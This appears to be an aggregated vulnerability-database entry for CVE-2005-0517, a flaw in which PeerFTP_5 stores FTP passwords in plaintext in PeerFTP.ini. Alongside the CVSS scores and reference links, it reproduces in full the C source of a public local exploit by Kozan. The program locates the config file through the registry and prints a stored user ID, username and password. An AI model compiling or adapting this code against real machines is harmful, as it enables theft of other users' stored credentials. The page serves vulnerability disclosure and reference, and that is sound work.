CVE-2005-0517
CVSS 2.1
Published: 2005-02-23 00:00:00
Last revised: 2008-09-05 16:46:31

[Original] PeerFTP_5 stores sensitive information such as passwords in plaintext in the PeerFTP.ini files, which allows local users to gain privileges.


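[CNNVD] PeerFTP_5 Insecure Password Storage Vulnerability (CNNVD-200502-087)

        PeerFTP is a file-sharing system. With it you can easily share files quickly with friends or colleagues.
        PeerFTP_5 stores sensitive information such as passwords in plain text in the PeerFTP.ini file, which allows local users to gain privileges.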

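- CVSS (Base Score)

CVSS score: 2.1 [LOW]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]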

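- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0517
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0517
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-087
(Official data source) CNNVD

- Other Links and Resources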

http://securitytracker.com/id?1013263
(VENDOR_ADVISORY)  SECTRACK  1013263

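- Vulnerability Information

PeerFTP_5 Insecure Password Storage Vulnerability
Low severity  Configuration error
2005-02-23 00:00:00 2005-10-20 00:00:00
Local
        PeerFTP is a file-sharing system. With it you can easily share files quickly with friends or colleagues.
        PeerFTP_5 stores sensitive information such as passwords in plain text in the PeerFTP.ini file, which allows local users to gain privileges.

- Advisories and Patches

        No data available

- Vulnerability Information (833)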

PeerFTP 5 Local Password Disclosure Exploit (EDBID:833)
windows local
2005-02-22 Verified
0 Kozan
N/A
/*****************************************************************

PeerFTP_5 Local Exploit by Kozan

Application: PeerFTP_5
Vendor: Acute Websight Incorporated
http://www.acutewebsight.com/peerftp_5.htm
Vulnerable Description: PeerFTP_5 discloses passwords to local users.

Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>

#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *userid1, *username1, *password1;

int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               /* fopen() failed, so there is no stream to close */
               return -1;
       }

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i<strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i>0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i > ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

char *oku(char *FilePath,char *Str)
{

       FILE *di;
       char cr;
       int i=0;
       static char Feature[500];   /* static: a pointer to this buffer is returned to the caller */

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

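       /* copy up to the next comma, leaving room for the terminating NUL */
       while(!feof(di) && i < (int)sizeof(Feature)-1)
       {
               cr=getc(di);
               if(cr == ',')
                       break;
               Feature[i] = cr;
               i++;
       }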

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}

int main(void)
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                                      (LPBYTE) prgfiles, &dwBufLen);

       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
               {
                       RegCloseKey(hKey);
                       printf("An error occured!\n");
           exit(1);
       }

       RegCloseKey(hKey);

   }
       else
       {
       RegCloseKey(hKey);
               printf("An error occured!\n");
       exit(1);
   }

       strcat(prgfiles,"\\AcuteWebsight\\PeerFTP_5\\PeerFTP.ini");

       printf("PeerFTP_5 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
       printf("This exploit only show the first profile and its password.\n");
       printf("You may improve it freely...\n\n");
       try{

       userid1=oku(prgfiles,"]=");
       printf("UserID 1   : %s\n",userid1);

       char username_temp[BUFSIZE];
       wsprintf(username_temp,"%s,",userid1);
       username1=oku(prgfiles,username_temp);
       printf("UserName 1 : %s\n",username1);

       char pass_temp[BUFSIZE];
       wsprintf(pass_temp,"%s,",username1);
       password1=oku(prgfiles,pass_temp);
       printf("Password 1 : %s\n",password1);

       }catch(...){ printf("An error occured!\n"); exit(1); }

       return 0;

}

// milw0rm.com [2005-02-22]
		

- Vulnerability Information

14088
PeerFTP_5 PeerFTP.ini User Credential Local Disclosure
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality Solution Unknown
Exploit Public

- Vulnerability Description

Unknown or Incomplete

- Timeline

2005-02-22 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

PeerFTP_5 Insecure Password Storage Vulnerability
Configuration Error 12670
No Yes
2005-02-26 12:00:00 2009-07-12 10:56:00
kozan@netmagister.com is credited with the discovery of this issue.

- Affected Program Versions

PeerFTP_5 PeerFTP_5

- Vulnerability Discussion

A local insecure password storage vulnerability affects PeerFTP_5. This issue is due to a failure of the application to store passwords with secure permissions by default.

A local attacker may leverage this issue to gain access to authentication credentials for FTP user accounts, facilitating unauthorized access.

- Exploit

No exploit is required to leverage this issue.

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related References

 

 
